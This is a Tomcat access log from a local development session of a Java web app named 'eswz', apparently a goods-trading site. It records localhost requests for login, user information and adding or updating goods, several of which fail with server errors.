0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:35:55 +0800] "POST /eswz/updateInformation HTTP/1.1" 200 85 http-bio-8080-exec-4 11
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:35:56 +0800] "GET /eswz/index HTTP/1.1" 200 17916 http-bio-8080-exec-4 17
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:36:11 +0800] "GET /eswz/toMyInformation HTTP/1.1" 200 8813 http-bio-8080-exec-4 10
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:36:11 +0800] "GET /eswz/index.css HTTP/1.1" 200 17916 http-bio-8080-exec-4 29
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:36:12 +0800] "GET /eswz/toupdateInformation?id=7 HTTP/1.1" 200 1380 http-bio-8080-exec-4 7
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:38:32 +0800] "GET /eswz/toupdateInformation?id=7 HTTP/1.1" 200 1380 http-bio-8080-exec-3 8
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:38:38 +0800] "GET /eswz/toAddGoods HTTP/1.1" 200 3282 http-bio-8080-exec-3 102
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:38:42 +0800] "POST /eswz/doAddGoods HTTP/1.1" 500 14084 http-bio-8080-exec-3 93
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:38:50 +0800] "GET /eswz/toMyGoods HTTP/1.1" 200 14021 http-bio-8080-exec-1 26
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:38:50 +0800] "GET /eswz/img/10.jpg HTTP/1.1" 304 - http-bio-8080-exec-7 8
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:38:50 +0800] "GET /eswz/index.css HTTP/1.1" 200 17916 http-bio-8080-exec-1 25
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:38:53 +0800] "GET /eswz/toUpdateGoods?goodsid=6 HTTP/1.1" 200 4390 http-bio-8080-exec-1 92
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:38:58 +0800] "POST /eswz/updateGoods HTTP/1.1" 200 93 http-bio-8080-exec-1 17
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:38:59 +0800] "GET /eswz/toMyGoods HTTP/1.1" 200 13689 http-bio-8080-exec-1 15
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:38:59 +0800] "GET /eswz/index.css HTTP/1.1" 200 17584 http-bio-8080-exec-1 18
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:39:07 +0800] "GET /eswz/toUpdateGoods?goodsid=4 HTTP/1.1" 200 4124 http-bio-8080-exec-1 10
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:39:08 +0800] "POST /eswz/updateGoods HTTP/1.1" 200 93 http-bio-8080-exec-1 11
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:39:09 +0800] "GET /eswz/toMyGoods HTTP/1.1" 200 13531 http-bio-8080-exec-1 18
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:39:09 +0800] "GET /eswz/index.css HTTP/1.1" 200 17426 http-bio-8080-exec-1 15
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:39:17 +0800] "GET /eswz/toUpdateGoods?goodsid=4 HTTP/1.1" 200 3966 http-bio-8080-exec-1 13
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:39:18 +0800] "POST /eswz/updateGoods HTTP/1.1" 200 93 http-bio-8080-exec-1 13
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:39:19 +0800] "GET /eswz/toMyGoods HTTP/1.1" 200 13531 http-bio-8080-exec-1 13
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:39:19 +0800] "GET /eswz/index.css HTTP/1.1" 200 17426 http-bio-8080-exec-1 19
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:40:59 +0800] "GET /eswz/toUpdateGoods?goodsid=4 HTTP/1.1" 200 3966 http-bio-8080-exec-3 14
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:41:07 +0800] "POST /eswz/updateGoods HTTP/1.1" 200 93 http-bio-8080-exec-3 13
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:41:09 +0800] "GET /eswz/toMyGoods HTTP/1.1" 200 13531 http-bio-8080-exec-3 13
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:41:09 +0800] "GET /eswz/index.css HTTP/1.1" 200 17426 http-bio-8080-exec-3 19
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:43:14 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:43:14 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 44
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:43:15 +0800] "GET /eswz/index HTTP/1.1" 200 16537 http-bio-8080-exec-4 486
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:43:18 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2670 http-bio-8080-exec-5 12
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:43:20 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 54 http-bio-8080-exec-6 22
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:43:29 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-7 15
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:43:29 +0800] "GET /eswz/index HTTP/1.1" 200 17426 http-bio-8080-exec-8 26
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:43:33 +0800] "GET /eswz/toMyGoods HTTP/1.1" 200 13531 http-bio-8080-exec-9 32
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:43:33 +0800] "GET /eswz/index.css HTTP/1.1" 200 17426 http-bio-8080-exec-10 29
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:43:35 +0800] "GET /eswz/toUpdateGoods?goodsid=4 HTTP/1.1" 200 3966 http-bio-8080-exec-10 19
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:43:36 +0800] "POST /eswz/updateGoods HTTP/1.1" 500 15125 http-bio-8080-exec-10 87
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:43:44 +0800] "POST /eswz/updateGoods HTTP/1.1" 500 15125 http-bio-8080-exec-2 14
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:44:20 +0800] "POST /eswz/updateGoods HTTP/1.1" 500 15207 http-bio-8080-exec-1 415
127.0.0.1 - - [03/Dec/2022:22:44:24 +0800] "POST /eswz/updateGoods HTTP/1.1" 500 15207 http-bio-8080-exec-2 16
127.0.0.1 - - [03/Dec/2022:22:44:31 +0800] "GET /eswz/index HTTP/1.1" 200 16537 http-bio-8080-exec-3 139
127.0.0.1 - - [03/Dec/2022:22:44:33 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2670 http-bio-8080-exec-5 8
127.0.0.1 - - [03/Dec/2022:22:44:35 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 54 http-bio-8080-exec-6 19
127.0.0.1 - - [03/Dec/2022:22:44:38 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-7 15
127.0.0.1 - - [03/Dec/2022:22:44:39 +0800] "GET /eswz/index HTTP/1.1" 200 17426 http-bio-8080-exec-8 27
127.0.0.1 - - [03/Dec/2022:22:44:42 +0800] "GET /eswz/toMyGoods HTTP/1.1" 200 13531 http-bio-8080-exec-9 37
127.0.0.1 - - [03/Dec/2022:22:44:42 +0800] "GET /eswz/index.css HTTP/1.1" 200 17426 http-bio-8080-exec-10 33
127.0.0.1 - - [03/Dec/2022:22:44:43 +0800] "GET /eswz/toUpdateGoods?goodsid=4 HTTP/1.1" 200 3966 http-bio-8080-exec-10 23
127.0.0.1 - - [03/Dec/2022:22:44:44 +0800] "POST /eswz/updateGoods HTTP/1.1" 500 15129 http-bio-8080-exec-10 16
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:45:14 +0800] "GET /eswz/toMyGoods HTTP/1.1" 500 4098 http-bio-8080-exec-1 75
127.0.0.1 - - [03/Dec/2022:22:45:18 +0800] "GET /eswz/index HTTP/1.1" 200 16537 http-bio-8080-exec-2 447
127.0.0.1 - - [03/Dec/2022:22:45:19 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2670 http-bio-8080-exec-4 8
127.0.0.1 - - [03/Dec/2022:22:45:21 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 54 http-bio-8080-exec-5 18
127.0.0.1 - - [03/Dec/2022:22:45:25 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 54 http-bio-8080-exec-6 11
127.0.0.1 - - [03/Dec/2022:22:45:30 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 54 http-bio-8080-exec-7 11
127.0.0.1 - - [03/Dec/2022:22:45:34 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-8 13
127.0.0.1 - - [03/Dec/2022:22:45:35 +0800] "GET /eswz/index HTTP/1.1" 200 17426 http-bio-8080-exec-9 28
127.0.0.1 - - [03/Dec/2022:22:45:37 +0800] "GET /eswz/toMyGoods HTTP/1.1" 200 13531 http-bio-8080-exec-10 34
127.0.0.1 - - [03/Dec/2022:22:45:37 +0800] "GET /eswz/index.css HTTP/1.1" 200 17426 http-bio-8080-exec-10 30
127.0.0.1 - - [03/Dec/2022:22:45:38 +0800] "GET /eswz/toUpdateGoods?goodsid=4 HTTP/1.1" 200 3966 http-bio-8080-exec-10 17
127.0.0.1 - - [03/Dec/2022:22:45:39 +0800] "POST /eswz/updateGoods HTTP/1.1" 200 93 http-bio-8080-exec-10 39
127.0.0.1 - - [03/Dec/2022:22:45:40 +0800] "GET /eswz/toMyGoods HTTP/1.1" 200 13534 http-bio-8080-exec-10 18
127.0.0.1 - - [03/Dec/2022:22:45:40 +0800] "GET /eswz/index.css HTTP/1.1" 200 17596 http-bio-8080-exec-10 20
